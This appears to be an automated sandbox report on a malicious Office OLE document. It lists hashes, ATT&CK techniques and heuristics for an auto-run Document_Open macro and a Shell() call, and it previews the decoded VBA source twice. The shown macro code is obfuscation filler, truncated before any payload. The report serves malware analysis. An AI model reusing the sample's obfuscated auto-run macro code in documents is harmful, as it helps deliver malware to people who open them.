Office (OLE) malware analysis — malicious · f0a6af8284dc9cd1

MALICIOUS

Office (OLE)

123.7 KB First seen: 2019-04-17

MD5: ecd2ea2b35fa347c635b8f1c6ca9dbad SHA-1: 09f9b0c9c3fda055f4275c3f500b1f470061c6ae SHA-256: f0a6af8284dc9cd152c4d083d0bb7775aaea4c814d8a5d9818cfdd8509ba1ad5

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an OLE document with a high-risk heuristic firing for a Shell() call within its VBA macros. The presence of a Document_Open macro indicates that the malicious code is designed to execute automatically when the document is opened. The VBA code is heavily obfuscated, but the critical Shell() function indicates an attempt to execute arbitrary commands, likely to download and run a second-stage payload.

Heuristics 5

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 126,653 bytes but its declared streams total only 52,715 bytes — 73,938 bytes (58%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28814 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	28814 bytes
SHA-256: `f2bfad55e32dd44d65ec4638b604488e8fbdb65cfabf0f63d42f47c1cd87bc12`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "oCorzdV" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function uDlRlVhivZIL() On Error Resume Next If zKFjJm >= HOQzu Then qBiKo = 183388958 + 155564576 ElseIf qaRpn < LvwQY Then For bBUCl = 96 To 3879 OMPLI = 58118 / kkjzV * jliPYj / SfwqG / (82454 * 81877 * 17115 + ttoQX) Next bJiSnj = Ubwbc / WslvWQ + 77999 - OYFRnA - (qqKEP * JZkGso / KWuiO / mfHzSz * 67357 * NkZAz) End If If bdiwEO >= wjGuoT Then jOmTzT = 183388958 + 155564576 ElseIf onUfmz < pNRfCr Then For frOAR = 96 To 3879 wUfWwC = 77076 / hnpOlT * qNQSQJ / WoOmb / (69318 * 8298 * 44074 + SfdjU) Next wjjJp = acRQY / odziB + 63258 - zqHJbE - (KPWiHm * hPhjG / zwMzV / NPsZj * 58536 * qWRqZH) End If If dllWNG >= TBpdc Then YriaD = 183388958 + 155564576 ElseIf NjjtsF < YwoLFt Then For YhkJH = 96 To 3879 saMGH = 79623 / JoVGw * LSKtst / jiQiq / (69567 * 68806 * 39350 + qHVTC) Next nUclCi = jaiMH / pOnsPq + 39374 - KhQXF - (JzOkf * PfqQHq / Jwpvdc / fmCOF * 55302 * kcmMNz) End If If lMwjN >= JXWlY Then KMVmm = 183388958 + 155564576 ElseIf EXWvzi < MfCEE Then For tCwMcz = 96 To 3879 PiVOfd = 63062 / XXHzZ * sIqqM / dAnGT / (35186 * 83713 * 60398 + OAsop) Next VBIPWw = pHuEib / uFVPi + 38176 - vPuNl - (QIXPL * lXHibq / vLjLP / PiKJic * 20224 * RZmNB) End If If Rjjfst >= cnXuZJ Then DPDfZ = 183388958 + 155564576 ElseIf WFztn < PTzUU Then For FYiiw = 96 To 3879 WtZCXl = 68375 / BzOKj * bOaLhq / siWiSC / (41370 * 37542 * 71654 + YTWIjw) Next iNJkz = Enlmz / zSzFoi + 29436 - XFjOj - (DprMZ * SFdTjH / MRrjPY / nbbNhi * 32343 * zcivBj) End If End Function Private Function NKIlIUbQzwV() On Error Resume Next If HsSLR >= Gbimp Then QJSTqd = 183388958 + 155564576 ElseIf VBfGw < zVujS Then For dOFRE = 96 To 3879 iwEsr = 61956 / NITQn * pZwSQb / VAUqLu / (23270 * 36919 * 24232 + LsOuH) Next zcKzwi = dEHrc / iwppSD + 67111 - NhwUoA - (IYZvht * pFcnn / qmDDjZ / RWCwqY * 7752 * vNfKhH) End If If uwvmz >= WlmHf Then lGULbn = 183388958 + 155564576 ElseIf DIjpZ < oWHMfY Then For cOpwDF = 96 To 3879 oHqbD = 55365 / WNGEX * PSvKI / pJCPY / (13010 * 66959 * 74747 + WQYIW) Next RvSIm = sRIAIH / cKTfn + 65286 - LlsRU - (pAzwi * BowXdC / YwruO / zSKuD * 72147 * aGIjDA) End If If iwuAiH >= NiQlma Then tkOTdl = 183388958 + 155564576 ElseIf cEJpQ < swdFpU Then For VHpZD = 96 To 3879 npSan = 33536 / RUuvO * jKFrlL / MqQBK / (92046 * 34910 * 38529 + lvpPT) Next jKiVXG = YChqLk / PPDNpz + 93010 - QPrzp - (izGwL * ivNPnH / SOUUkh / sWrba * 41534 * HtPiY) End If If pCarz >= SUCoai Then dKwvG = 183388958 + 155564576 ElseIf SRLIi < piXBw Then For OqRcMt = 96 To 3879 lhFXUD = 2218 / IYwwUX * wBdtv / JRvTE / (4782 * 22220 * 83386 + BwDSVj) Next urFdh = KaEdOI / PwSzJb + 32256 - EQApA - (XztBB * mHmoS / cHUOao / wjCjF * 18381 * TBpbEo) End If If mcLcM >= GIMdfX Then JqqpMm = 183388958 + 155564576 ElseIf jVRnr < DkRKj Then For FHUsCz = 96 To 3879 RsYpCZ = 73499 / JLzlsB * oRKXkF / WqBuBS / (84226 * 79259 * 96244 + skUJIf) Next OFMtY = YrcZS / hfMWj + 43254 - oIXUDU - (MtHhW * mvJfso / YcDZsZ / RIfOkm * 50943 * HqlJZL) End If End Function Private Function ZNBZsodYhlDmfZ() On Error Resume Next If wtJqK >= ZjHSpE Then boHjv = 183388958 + 155564576 ElseIf icWOsw < PHFSZb Then For cIvzt = 96 To 3879 Jljfah = 44610 / qMrlwr * hciQsW / SaptO / (5511 * 70693 * 36367 + JmzYzw) Next nLatZu = hajQu / QjBckT + 1126 ... (truncated)

SHA-256: f2bfad55e32dd44d65ec4638b604488e8fbdb65cfabf0f63d42f47c1cd87bc12

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "oCorzdV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function uDlRlVhivZIL()
On Error Resume Next
   If zKFjJm >= HOQzu Then
      qBiKo = 183388958 + 155564576
      ElseIf qaRpn < LvwQY Then
      For bBUCl = 96 To 3879
         OMPLI = 58118 / kkjzV * jliPYj / SfwqG / (82454 * 81877 * 17115 + ttoQX)
      Next
      bJiSnj = Ubwbc / WslvWQ + 77999 - OYFRnA - (qqKEP * JZkGso / KWuiO / mfHzSz * 67357 * NkZAz)
   End If
   If bdiwEO >= wjGuoT Then
      jOmTzT = 183388958 + 155564576
      ElseIf onUfmz < pNRfCr Then
      For frOAR = 96 To 3879
         wUfWwC = 77076 / hnpOlT * qNQSQJ / WoOmb / (69318 * 8298 * 44074 + SfdjU)
      Next
      wjjJp = acRQY / odziB + 63258 - zqHJbE - (KPWiHm * hPhjG / zwMzV / NPsZj * 58536 * qWRqZH)
   End If
   If dllWNG >= TBpdc Then
      YriaD = 183388958 + 155564576
      ElseIf NjjtsF < YwoLFt Then
      For YhkJH = 96 To 3879
         saMGH = 79623 / JoVGw * LSKtst / jiQiq / (69567 * 68806 * 39350 + qHVTC)
      Next
      nUclCi = jaiMH / pOnsPq + 39374 - KhQXF - (JzOkf * PfqQHq / Jwpvdc / fmCOF * 55302 * kcmMNz)
   End If
   If lMwjN >= JXWlY Then
      KMVmm = 183388958 + 155564576
      ElseIf EXWvzi < MfCEE Then
      For tCwMcz = 96 To 3879
         PiVOfd = 63062 / XXHzZ * sIqqM / dAnGT / (35186 * 83713 * 60398 + OAsop)
      Next
      VBIPWw = pHuEib / uFVPi + 38176 - vPuNl - (QIXPL * lXHibq / vLjLP / PiKJic * 20224 * RZmNB)
   End If
   If Rjjfst >= cnXuZJ Then
      DPDfZ = 183388958 + 155564576
      ElseIf WFztn < PTzUU Then
      For FYiiw = 96 To 3879
         WtZCXl = 68375 / BzOKj * bOaLhq / siWiSC / (41370 * 37542 * 71654 + YTWIjw)
      Next
      iNJkz = Enlmz / zSzFoi + 29436 - XFjOj - (DprMZ * SFdTjH / MRrjPY / nbbNhi * 32343 * zcivBj)
   End If
End Function
Private Function NKIlIUbQzwV()
On Error Resume Next
   If HsSLR >= Gbimp Then
      QJSTqd = 183388958 + 155564576
      ElseIf VBfGw < zVujS Then
      For dOFRE = 96 To 3879
         iwEsr = 61956 / NITQn * pZwSQb / VAUqLu / (23270 * 36919 * 24232 + LsOuH)
      Next
      zcKzwi = dEHrc / iwppSD + 67111 - NhwUoA - (IYZvht * pFcnn / qmDDjZ / RWCwqY * 7752 * vNfKhH)
   End If
   If uwvmz >= WlmHf Then
      lGULbn = 183388958 + 155564576
      ElseIf DIjpZ < oWHMfY Then
      For cOpwDF = 96 To 3879
         oHqbD = 55365 / WNGEX * PSvKI / pJCPY / (13010 * 66959 * 74747 + WQYIW)
      Next
      RvSIm = sRIAIH / cKTfn + 65286 - LlsRU - (pAzwi * BowXdC / YwruO / zSKuD * 72147 * aGIjDA)
   End If
   If iwuAiH >= NiQlma Then
      tkOTdl = 183388958 + 155564576
      ElseIf cEJpQ < swdFpU Then
      For VHpZD = 96 To 3879
         npSan = 33536 / RUuvO * jKFrlL / MqQBK / (92046 * 34910 * 38529 + lvpPT)
      Next
      jKiVXG = YChqLk / PPDNpz + 93010 - QPrzp - (izGwL * ivNPnH / SOUUkh / sWrba * 41534 * HtPiY)
   End If
   If pCarz >= SUCoai Then
      dKwvG = 183388958 + 155564576
      ElseIf SRLIi < piXBw Then
      For OqRcMt = 96 To 3879
         lhFXUD = 2218 / IYwwUX * wBdtv / JRvTE / (4782 * 22220 * 83386 + BwDSVj)
      Next
      urFdh = KaEdOI / PwSzJb + 32256 - EQApA - (XztBB * mHmoS / cHUOao / wjCjF * 18381 * TBpbEo)
   End If
   If mcLcM >= GIMdfX Then
      JqqpMm = 183388958 + 155564576
      ElseIf jVRnr < DkRKj Then
      For FHUsCz = 96 To 3879
         RsYpCZ = 73499 / JLzlsB * oRKXkF / WqBuBS / (84226 * 79259 * 96244 + skUJIf)
      Next
      OFMtY = YrcZS / hfMWj + 43254 - oIXUDU - (MtHhW * mvJfso / YcDZsZ / RIfOkm * 50943 * HqlJZL)
   End If
End Function
Private Function ZNBZsodYhlDmfZ()
On Error Resume Next
   If wtJqK >= ZjHSpE Then
      boHjv = 183388958 + 155564576
      ElseIf icWOsw < PHFSZb Then
      For cIvzt = 96 To 3879
         Jljfah = 44610 / qMrlwr * hciQsW / SaptO / (5511 * 70693 * 36367 + JmzYzw)
      Next
      nLatZu = hajQu / QjBckT + 1126
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.